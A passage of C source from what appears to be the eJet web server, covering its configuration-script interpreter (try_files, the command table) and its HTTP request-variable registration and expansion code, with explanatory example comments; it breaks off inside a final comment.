pbgn += 9;
while (pbgn < pend) {
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file from list to check if existing or not */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
name[0] = '\0';
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 1);
namelen = strlen(name);
pbgn = skipOver(poct, pexpend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) {
lastitem = 1;
}
if (namelen <= 0) continue;
if (name[0] == '=') {
status = str_to_int(name+1, namelen-1, 10, NULL);
msg->SetStatus(msg, status, NULL);
msg->Reply(msg);
hsc->exitflag = 1;
hsc->replied = 1;
break;
} else if (name[0] == '@') {
/* consequently, internally redirect to another location within same host */
phost = (HTTPHost *)msg->phost;
if (!phost) continue;
ploc = ht_get(phost->exact_loc_table, name);
if (ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = msg->docuri->pathlen;
}
} else {
if (lastitem) {
msg->SetDocURL(msg, name, namelen, 0, 0);
break;
}
if (msg->GetLocFile(msg, name, namelen, NULL, 0, path, sizeof(path)-1) > 0) {
msg->SetDocURL(msg, path, strlen(path), 0, 0);
break;
}
}
}
return pexpend;
}
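
/* Illustrative, hypothetical 'try_files' examples matching the syntax parsed
   above. Each item is checked in turn; "=code" replies with that status,
   "@name" redirects internally to a named location in the same host, and the
   last plain item becomes the document URI unconditionally:

     try_files $uri /default.html =404;
     try_files $uri @backend_loc;

   /default.html and @backend_loc are placeholders. */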
int http_script_parse_exec (void * vhsc, char * sc, int sclen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int len = 0;
ScriptParser * parser = NULL;
if (!hsc) return -1;
if (!sc) {
sc = hsc->script;
sclen = hsc->scriptlen;
}
if (!sc) return -2;
if (sclen < 0) sclen = strlen(sc);
if (sclen <= 0) return -3;
pbgn = sc;
pend = sc + sclen;
while (pbgn < pend && !hsc->exitflag && !hsc->replied) {
pbgn = skipOver(pbgn, pend-pbgn, "; \t\r\n\f\v", 7);
if (pbgn >= pend) break;
/* skip the Comment lines (prefix #) or blocks */
if (*pbgn == '#') {
pbgn = skipTo(pbgn, pend-pbgn, "\r\n", 2);
continue;
} else if (pbgn[0] == '/' && pbgn[1] == '*') {
pbgn += 2;
//find the comment end * and /
for (poct = pbgn; poct < pend; ) {
poct = skipTo(poct, pend-poct, "*", 1);
if (poct < pend - 1 && poct[1] != '/') {
poct++;
continue;
} else break;
}
if (poct >= pend - 1) {
pbgn = poct;
} else if (poct[0] == '*' && poct[1] == '/') {
pbgn = poct + 2;
}
continue;
}
if (*pbgn == '$') { //var $tmp = 1;
            poct = script_assignment_parse(hsc, pbgn, pend-pbgn);
if (!poct) return -100;
pbgn = poct;
continue;
}
for (poct = pbgn, len = 0; poct < pend; poct++, len++) {
if (len == 0 && !is_var_char(*poct)) break;
if (len > 0 && !is_var_char(*poct) && !isdigit(*poct)) break;
}
len = poct - pbgn;
parser = script_parser_get(pbgn, len);
if (parser) {
poct = (*parser)(hsc, pbgn, pend-pbgn);
if (!poct) return -101;
pbgn = poct;
continue;
}
/* unknown token, find the end flag of the expression */
pbgn = skipTo(poct, pend-poct, ";", 1);
continue;
}
return 0;
}
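
/* Illustrative, hypothetical script fragment showing what the executor above
   recognizes: '#' line comments, C-style block comments, '$var = value;'
   assignments and the registered commands:

     #mark the request and expose the mark in the response
     $mark = "on";
     if ($mark == "on") { addResHeader X-Mark $mark; }

   $mark and X-Mark are placeholder names. */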
int http_script_segment_exec (void * vmsg, char * psc, int sclen,
char ** pval, int * vallen, char * vname, int vtype)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc = {0};
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int ret = 0;
if (pval) *pval = NULL;
if (vallen) *vallen = 0;
if (!msg) return -1;
pbgn = psc;
pend = psc + sclen;
poct = sun_find_string(pbgn, pend-pbgn, "<script>", 8, NULL);
if (poct) {
pbgn = poct + 8;
poct = sun_find_string(pbgn, pend-pbgn, "</script>", 9, NULL);
if (poct) pend = poct;
}
http_script_init(&hsc, msg, pbgn, pend-pbgn, 0, vname, vtype);
ret = http_script_parse_exec(&hsc, pbgn, pend-pbgn);
if (ret >= 0 && pval) {
*pval = hsc.retval;
hsc.retval = NULL;
}
if (vallen) *vallen = hsc.retvallen;
http_script_free(&hsc);
return 0;
}
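
/* Illustrative, hypothetical embedded-script segment. The helper above looks
   for <script> ... </script> markers inside a string value, executes the
   enclosed statements, and hands back the value produced by 'return' through
   pval/vallen:

     <script>
       if ($request_path ^~ "/video/") return "med";
       return "std";
     </script>

   The returned tokens "med" and "std" are placeholders. */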
int http_script_exec (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
int i, num;
ckstr_t * psc = NULL;
uint8 reloc = 0;
uint8 replied = 0;
if (!msg) return -1;
memset(&hsc, 0, sizeof(hsc));
hl = (HTTPListen *)msg->hl;
if (hl) {
num = arr_num(hl->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(hl->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 1, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
host = (HTTPHost *)msg->phost;
if (host) {
num = arr_num(host->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(host->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 2, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
num = arr_num(ploc->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(ploc->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 3, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
return 1;
}
int http_reply_script_exec (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
int i, num;
ckstr_t * psc = NULL;
if (!msg) return -1;
memset(&hsc, 0, sizeof(hsc));
hl = (HTTPListen *)msg->hl;
if (hl) {
num = arr_num(hl->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(hl->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 1, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
host = (HTTPHost *)msg->phost;
if (host) {
num = arr_num(host->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(host->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 2, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
num = arr_num(ploc->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(ploc->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 3, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
return 1;
}
void script_parser_init ()
{
int i, num;
ckstr_t key;
static scmd_t scmd_tab [] = {
{ "if", 2, script_if_parse },
{ "set", 3, script_set_parse },
{ "reply", 5, script_reply_parse },
{ "return", 6, script_return_parse },
{ "rewrite", 7, script_rewrite_parse },
{ "addReqHeader", 12, script_add_req_header_parse },
{ "addResHeader", 12, script_add_res_header_parse },
{ "delReqHeader", 12, script_del_req_header_parse },
{ "delResHeader", 12, script_del_res_header_parse },
{ "addResBody", 10, script_add_res_body_parse },
{ "appendResBody", 13, script_append_res_body_parse },
{ "addFile2ResBody", 15, script_add_file_to_res_body_parse },
{ "appendFile2ResBody", 18, script_append_file_to_res_body_parse },
{ "try_files", 9, script_try_files_parse }
};
if (script_parser_table) return;
script_parser_table = ht_only_new(200, ckstr_cmp);
if (!script_parser_table) return;
ht_set_hash_func(script_parser_table, ckstr_string_hash);
num = sizeof(scmd_tab) / sizeof(scmd_tab[0]);
for (i = 0; i < num; i++) {
key.p = scmd_tab[i].cmd;
key.len = scmd_tab[i].len;
ht_set(script_parser_table, &key, &scmd_tab[i]);
}
}
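
/* Each scmd_tab entry above maps a script keyword to the parse callback that
   consumes one expression and returns the position just after it. As a
   hypothetical sketch only, a new command would be registered by adding a row
   such as

     { "myCommand", 9, script_my_command_parse },

   where script_my_command_parse(void * vhsc, char * p, int len) follows the
   same contract as the existing parsers. myCommand and its parser are
   placeholder names, not part of the existing command set. */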
void script_parser_clean ()
{
if (!script_parser_table) return;
ht_free(script_parser_table);
script_parser_table = NULL;
}
void * script_parser_get (char * cmd, int len)
{
ckstr_t key = ckstr_init(cmd, len);
scmd_t * scmd;
scmd = ht_get(script_parser_table, &key);
if (scmd) return scmd->parser;
return NULL;
}
<|start_filename|>src/http_variable.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include <stddef.h>
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_header.h"
#include "http_request.h"
#include "http_listen.h"
#include "http_script.h"
#include "http_variable.h"
int http_var_cmp_name (void * a, void * b)
{
http_var_t * var = (http_var_t *)a;
char * vname = (char *)b;
return str_casecmp(var->varname, vname);
}
void http_var_name (http_var_t * var, char * vname)
{
int len = 0;
if (!var || !vname) return;
len = strlen(vname);
if (len <= 0) return;
str_secpy(var->varname, sizeof(var->varname)-1, vname, len);
}
int http_var_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
http_var_t * var = NULL;
int i, ind = 0;
if (!mgmt) return -1;
mgmt->varsize = 48;
mgmt->variable = var = kzalloc(mgmt->varsize * sizeof(http_var_t));
//0-char 1-short 2-int 3-char[]
http_var_name(&var[ind], "remote_addr");
http_var_set6(&var[ind], HTTPMsg, srcip, dstip, 4, 0);
ind++;
http_var_name(&var[ind], "remote_port");
http_var_set6(&var[ind], HTTPMsg, srcport, dstport, 2, 0);
ind++;
http_var_name(&var[ind], "server_addr");
http_var_set(&var[ind], HTTPMsg, dstip, 4, 0, 0);
ind++;
http_var_name(&var[ind], "server_port");
http_var_set(&var[ind], HTTPMsg, req_port, 2, 0, 0);
ind++;
http_var_name(&var[ind], "request_method");
http_var_set(&var[ind], HTTPMsg, req_meth, 4, 0, 0);
ind++;
http_var_name(&var[ind], "scheme");
http_var_set2(&var[ind], HTTPMsg, req_scheme, req_schemelen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "host_name");
http_var_set2(&var[ind], HTTPMsg, req_host, req_hostlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request_path");
http_var_set2(&var[ind], HTTPMsg, req_path, req_pathlen, 5, 0, 0);
//http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "query_string");
http_var_set2(&var[ind], HTTPMsg, req_query, req_querylen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_path_only");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, dir, dirlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_only");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file, filelen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_base");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file_base, file_baselen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_ext");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file_ext, file_extlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "real_file");
http_var_set3(&var[ind], 8, 0);
ind++;
http_var_name(&var[ind], "real_path");
http_var_set3(&var[ind], 8, 0);
ind++;
http_var_name(&var[ind], "bytes_recv");
http_var_set6(&var[ind], HTTPMsg, req_stream_recv, res_stream_recv, 3, 0);
ind++;
http_var_name(&var[ind], "bytes_sent");
http_var_set6(&var[ind], HTTPMsg, res_stream_sent, req_stream_sent, 3, 0);
ind++;
http_var_name(&var[ind], "status");
http_var_set(&var[ind], HTTPMsg, res_status, 2, 0, 0);
ind++;
http_var_name(&var[ind], "document_root");
http_var_set(&var[ind], HTTPLoc, root, 4, 0, 2);
ind++;
http_var_name(&var[ind], "fastcgi_script_name");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "content_type");
http_var_set2(&var[ind], HTTPMsg, req_content_type, req_contype_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "content_length");
http_var_set(&var[ind], HTTPMsg, req_body_length, 3, 0, 0);
ind++;
http_var_name(&var[ind], "absuri");
http_var_set4(&var[ind], HTTPMsg, absuri, HTTPUri, uri, 6, 0, 0);
ind++;
http_var_name(&var[ind], "uri");
http_var_set5(&var[ind], HTTPMsg, uri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request_uri");
http_var_set4(&var[ind], HTTPMsg, uri, HTTPUri, uri, 6, 0, 0);
ind++;
http_var_name(&var[ind], "document_uri");
//http_var_set4(&var[ind], HTTPMsg, docuri, HTTPUri, uri, 6, 0, 0);
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request");
http_var_set2(&var[ind], HTTPMsg, req_line, req_line_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "http_user_agent");
http_var_set2(&var[ind], HTTPMsg, req_useragent, req_useragent_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "http_cookie");
http_var_set2(&var[ind], HTTPMsg, req_cookie, req_cookie_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "server_protocol");
http_var_set(&var[ind], HTTPMgmt, httpver1, 4, 0, 1);
ind++;
http_var_name(&var[ind], "ejet_version");
http_var_global(&var[ind], g_http_version, 4, 0, 3);
ind++;
http_var_name(&var[ind], "request_header");
var[ind].valtype = 7; //array
var[ind].arraytype = 1; //request header
ind++;
http_var_name(&var[ind], "cookie");
var[ind].valtype = 7; //array
var[ind].arraytype = 2; //cookie
ind++;
http_var_name(&var[ind], "query");
var[ind].valtype = 7; //array
var[ind].arraytype = 3; //query
ind++;
http_var_name(&var[ind], "response_header");
var[ind].valtype = 7; //array
var[ind].arraytype = 4; //response header
ind++;
http_var_name(&var[ind], "datetime");
var[ind].valtype = 7; //array
var[ind].arraytype = 5; //datetime
ind++;
http_var_name(&var[ind], "date");
var[ind].valtype = 7; //array
var[ind].arraytype = 6; //date
ind++;
http_var_name(&var[ind], "time");
var[ind].valtype = 7; //array
var[ind].arraytype = 7; //time
ind++;
mgmt->varnum = ind;
//mgmt->var_table = ht_only_new(mgmt->varnum * 3, http_var_cmp_name);
mgmt->var_table = ht_only_new(149, http_var_cmp_name);
for (i = 0; i < ind; i++) {
ht_set(mgmt->var_table, var[i].varname, &var[i]);
}
tolog(1, "eJet - %d HTTP Variables init successfully.\n", ind);
return 0;
}
int http_var_free (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
if (mgmt->var_table) {
ht_free(mgmt->var_table);
mgmt->var_table = NULL;
}
kfree(mgmt->variable);
tolog(1, "eJet - HTTP Variables freed.\n");
return 0;
}
int http_var_value (void * vmsg, char * vname, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
http_var_t * var = NULL;
char sbuf[128];
char varmain[128];
char * plist[4] = {NULL};
int plen[4] = {0};
int ret = 0;
void * obj = NULL;
void * subobj = NULL;
void * objlen = NULL;
char * pval = NULL;
frame_p frm = NULL;
int flen = 0;
if (!msg) return -1;
if (!vname || strlen(vname) <= 0) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
/* query [ fid ] */
ret = string_tokenize(vname, -1, "[] \t\r\n", 6, (void **)plist, plen, 4);
if (ret < 0) return -4;
str_secpy(varmain, sizeof(varmain)-1, plist[0], plen[0]);
var = ht_get(mgmt->var_table, varmain);
if (!var) return -100;
/* if it's an array variable. eg. request_header[content-type] */
if (var->valtype == 7) {
switch (var->arraytype) {
case 1: //request header
return http_var_header_value(msg, 0, plist[1], plen[1], buf, len);
case 2: //cookie
return http_var_cookie_value(msg, plist[1], plen[1], buf, len);
case 3: //query
return http_var_query_value(msg, plist[1], plen[1], buf, len);
case 4: //response header
return http_var_header_value(msg, 1, plist[1], plen[1], buf, len);
case 5: //datetime, datatime[createtime], datetime[stamp]
case 6: //date, date[createtime], date[stamp]
case 7: //time, time[createtime], time[stamp]
return http_var_datetime_value(msg, plist[1], plen[1], buf, len, var->arraytype);
}
return -110;
}
ploc = (HTTPLoc *)msg->ploc;
if (!ploc && var->structtype == 2) return -4;
switch (var->structtype) {
case 0: //HTTPMsg
obj = (uint8 *)msg + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else if (var->condcheck) {
if (msg->msgtype == 0) {
obj = (uint8 *)msg + var->subfldpos;
}
} else {
if (var->haslen)
objlen = (uint8 *)msg + var->fldlenpos;
}
break;
case 1: //HTTPMgmt
obj = (uint8 *)mgmt + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else {
if (var->haslen)
objlen = (uint8 *)mgmt + var->fldlenpos;
}
break;
case 2: //HTTPLoc
obj = (uint8 *)ploc + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else {
if (var->haslen)
objlen = (uint8 *)ploc + var->fldlenpos;
}
break;
case 3: //global variable
obj = var->field;
break;
}
if (obj) {
switch (var->valtype) {
case 0: //char
if (var->unsign) {
ret = sprintf(sbuf, "%d", *(uint8 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(char *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 1: //short
if (var->unsign) {
ret = sprintf(sbuf, "%d", *(uint16 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(int16 *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 2: //int
if (var->unsign) {
ret = sprintf(sbuf, "%u", *(uint32 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(int *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 3: //int64
if (var->unsign) {
#if defined(_WIN32) || defined(_WIN64)
ret = sprintf(sbuf, "%I64u", *(uint64 *) obj );
#else
ret = sprintf(sbuf, "%llu", *(uint64 *) obj );
#endif
} else {
#if defined(_WIN32) || defined(_WIN64)
ret = sprintf(sbuf, "%I64d", *(int64 *) obj );
#else
ret = sprintf(sbuf, "%lld", *(int64 *) obj );
#endif
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 4: //char []
pval = (char *) obj;
if (var->haslen)
flen = *(int *) objlen;
else
flen = strlen((char *)pval);
if (buf) {
str_secpy(buf, len, (char *)pval, flen);
return strlen(buf);
}
return flen;
case 5: //char *
pval = *(char **) obj;
if (var->haslen)
flen = *(int *) objlen;
else
flen = strlen((char *)pval);
if (buf) {
str_secpy(buf, len, (char *)pval, flen);
return strlen(buf);
}
return flen;
case 6: //frame_p
frm = *(frame_p *) obj;
if (buf) {
str_secpy(buf, len, frame_string(frm), frameL(frm));
return strlen(buf);
}
return frameL(frm);
case 8: //function
if (str_casecmp(var->varname, "real_file") == 0) {
return http_real_file(obj, buf, len);
} else if (str_casecmp(var->varname, "real_path") == 0) {
return http_real_path(obj, buf, len);
}
break;
}
}
return -200;
}
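
/* Illustrative variable lookups resolved by the function above. Plain names
   use the registered variable table; array-typed names take a key in
   brackets. The key names below are placeholders:

     remote_addr                    request_path
     request_header[content-type]   cookie[sessionid]
     query[fid]                     response_header[content-length]
     datetime[stamp]                date[compact]
*/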
static int is_var_char (int c)
{
/*if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') )
return 1;*/
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
return 0;
}
int http_var_copy (void * vmsg, char * vstr, int vlen, char * buf, int buflen,
ckstr_t * pmat, int matnum, char * lastvname, int lasttype)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
HTTPHost * host = NULL;
HTTPListen * hl = NULL;
char vname[128];
int ret, iter = 0;
int i, len = 0, matind = 0;
int retlen = 0;
void * jobj[3];
int jobjnum = 0;
char * pbgn = NULL;
char * pend = NULL;
char * pval = NULL;
char * poct = NULL;
char * pvarend = NULL;
if (!msg) return -1;
if (!vstr) return -2;
if (vlen < 0) vlen = strlen(vstr);
if (vlen <= 0) return -3;
if (buf && buflen > 0) buf[0] = '\0';
ploc = (HTTPLoc *)msg->ploc;
host = (HTTPHost *)msg->phost;
hl = (HTTPListen *)msg->hl;
jobjnum = 0;
if (ploc) jobj[jobjnum++] = ploc->jsonobj;
if (host) jobj[jobjnum++] = host->jsonobj;
if (hl) jobj[jobjnum++] = hl->jsonobj;
pbgn = vstr;
pend = vstr + vlen;
for (iter = 0; pbgn < pend; ) {
if (buf && buflen > 0 && iter >= buflen)
break;
if (*pbgn == '$') {
if (pbgn[1] == '{') {
poct = skipToPeer(pbgn+1, pend-pbgn-1, '{', '}');
if (!poct || poct >= pend) goto docopy;
pbgn = skipOver(pbgn+2, poct-pbgn-2, " \t\r\n", 4);
if (pbgn >= poct) { pbgn = poct + 1; continue; }
/* ${ remote_addr }, or ${ query [ fid ] }, or ${1} */
pvarend = rskipOver(poct-1, poct-pbgn, " \t\r\n", 4);
str_secpy(vname, sizeof(vname)-1, pbgn, pvarend-pbgn+1);
pbgn = poct + 1;
} else {
poct = pbgn + 1;
/* variable name may be like: $1 $2 */
while (is_var_char(*poct) && poct < pend) poct++;
if (poct <= pbgn + 1) goto docopy;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipTo(poct, pend-poct, "]", 1);
if (*poct == ']') poct++;
}
str_secpy(vname, sizeof(vname)-1, pbgn + 1, poct-pbgn-1);
pbgn = poct;
}
/* first, check if the var-string exists numeric variable pointing to the input mating array,
variable type: 1 */
ret = strlen(vname);
for (i = 0; i < ret && isdigit(vname[i]); i++);
if (i >= ret) { //all chars of variable name are digits
if (!pmat || matnum <= 0) {
pmat = msg->matchstr;
matnum = msg->matchnum;
}
if (pmat && matnum > 0) {
matind = strtol(vname, NULL, 10);
if (matind < matnum) {
if (!buf)
iter += pmat[matind].len;
else
iter += str_secpy(buf + iter, buflen - iter, pmat[matind].p, pmat[matind].len);
continue;
}
}
}
/* second, check the dynamic temporary local variables set by scripts in configuration
variable type: 2 */
if (buf && buflen > 0)
ret = http_msg_var_get(msg, vname, buf + iter, buflen - iter);
else
ret = http_msg_var_get(msg, vname, NULL, 0);
if (ret >= 0) {
iter += ret;
continue;
}
/* third, check global variables or HTTPMsg common parameters
variable type: 3 */
if (buf && buflen > 0) {
buf[iter] = '\0';
ret = http_var_value(msg, vname, buf + iter, buflen - iter);
} else {
ret = http_var_value(msg, vname, NULL, 0);
}
if (ret >= 0) iter += ret;
/* at last, check the variables defined in Location, Host, Listen
variable type: 4 */
if (lastvname && strcasecmp(vname, lastvname) == 0 && lasttype == 4)
                continue;
for (ret = 0, i = 0; i < jobjnum; i++) {
ret = json_mgetP(jobj[i], vname, strlen(vname), (void **)&poct, &len);
if (ret > 0) {
if (strncasecmp(poct, "<script>", 8) == 0) {
http_script_segment_exec(msg, poct, len, &pval, &retlen, vname, 4);
if (buf) {
if (pval && retlen > 0)
iter += str_secpy(buf + iter, buflen-iter, pval, retlen);
} else {
iter += retlen;
}
if (pval) kfree(pval);
break;
} else {
/* how to solve the recursive parsing is a problem.
$root = $root$path$fid$fileext; */
if (buf)
ret = http_var_copy(msg, poct, len, buf+iter, buflen-iter, NULL, 0, vname, 4);
else
ret = http_var_copy(msg, poct, len, NULL, 0, NULL, 0, vname, 4);
if (ret > 0) {
iter += ret;
break;
}
}
}
}
continue;
}
docopy:
if (buf && buflen > 0) {
buf[iter++] = *pbgn++;
} else {
iter++; pbgn++;
}
}
if (buf && buflen > 0) buf[iter] = '\0';
return iter;
}
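
/* Illustrative, hypothetical interpolation strings that the copier above
   expands. $name and ${name} reference variables; $1/${1} refer to regex
   capture groups taken from msg->matchstr or the pmat argument:

     "$scheme://$host_name$request_uri"
     "${document_root}/cache/${req_file_only}"
     "/new/$1"

   The literal path segments are placeholders. */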
void http_var_print (void * vmsg, char * varn, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
http_var_t * var = NULL;
char vname[64];
char buf[4096];
int i = 0;
if (!msg) return;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return;
var = (http_var_t *)mgmt->variable;
if (varn) {
http_var_copy(msg, varn, len, buf, sizeof(buf)-1, NULL, 0, NULL, 0);
printf("%s = %s\n", varn, buf);
return;
}
for (i = 0; i < mgmt->varnum; i++) {
sprintf(vname, "$%s", var[i].varname);
http_var_copy(msg, vname, strlen(vname), buf, sizeof(buf)-1, NULL, 0, NULL, 0);
printf("%-3d $%s = %s\n", i, var[i].varname, buf);
}
}
int http_var_header_value (void * vmsg, int type, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return -1;
punit = http_header_get(msg, type, name, namelen);
if (!punit) return -2;
if (buf && len > 0) {
str_secpy(buf, len, HUValue(punit), punit->valuelen);
return strlen(buf);
}
return punit->valuelen;
}
int http_var_cookie_value (void * vmsg, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return -1;
if (name && namelen < 0) namelen = strlen(name);
if (!name || namelen <= 0) {
if (buf && len > 0) {
return str_secpy(buf, len, msg->req_cookie, msg->req_cookie_len);
}
return msg->req_cookie_len;
}
punit = http_req_getcookie(msg, name, namelen);
if (!punit) return -2;
if (buf && len > 0) {
str_secpy(buf, len, HUValue(punit), punit->valuelen);
return strlen(buf);
}
return punit->valuelen;
}
int http_var_query_value (void * vmsg, char * name, int namelen, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pval = NULL;
int vlen = 0;
char tmpbuf[64];
int seq = 0;
if (!msg) return -1;
if (!msg->req_query_kvobj) return -2;
if (name && namelen < 0) namelen = strlen(name);
if (!name || namelen <= 0) {
if (buf && len > 0) {
return str_secpy(buf, len, msg->req_query, msg->req_querylen);
}
return msg->req_querylen;
}
if (kvpair_getP(msg->req_query_kvobj, name, namelen, 0, (void **)&pval, &vlen) <= 0) {
if (isdigit(*name)) {
str_secpy(tmpbuf, sizeof(tmpbuf)-1, name, namelen);
seq = strtol(tmpbuf, NULL, 10);
if (kvpair_seq_get(msg->req_query_kvobj, seq, 0, (void **)&pval, &vlen) <= 0) {
return -12;
}
} else {
return -12;
}
}
if (buf && len > 0) {
str_secpy(buf, len, pval, vlen);
return strlen(buf);
}
return vlen;
}
int http_var_datetime_value(void * vmsg, char * name, int namelen, char * buf, int len, int type)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
struct tm st;
time_t curt;
if (!msg) return -1;
if (name && namelen == 10 && strncasecmp(name, "createtime", 10) == 0)
curt = msg->createtime;
else if (name && namelen == 5 && strncasecmp(name, "stamp", 5) == 0)
curt = msg->stamp;
else
curt = time(0);
st = *localtime(&curt);
if (type == 6) {
        if (name && namelen == 7 && strncasecmp(name, "compact", 7) == 0) {
            if (buf && len >= 8)
                sprintf(buf, "%04d%02d%02d", st.tm_year+1900, st.tm_mon+1, st.tm_mday);
            return 8;
        }
        if (buf && len >= 10)
            sprintf(buf, "%04d-%02d-%02d", st.tm_year+1900, st.tm_mon+1, st.tm_mday);
        return 10;
} else if (type == 7) {
if (buf && len >= 8)
sprintf(buf, "%02d:%02d:%02d", st.tm_hour, st.tm_min, st.tm_sec);
return 8;
} else {
if (buf && len >= 19)
sprintf(buf, "%04d-%02d-%02d %02d:%02d:%02d",
st.tm_year+1900, st.tm_mon+1, st.tm_mday,
st.tm_hour, st.tm_min, st.tm_sec);
return 19;
}
return 0;
}
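
/* Illustrative example values only, showing the formats produced above. The
   bracket key selects msg->createtime, msg->stamp or the current time:

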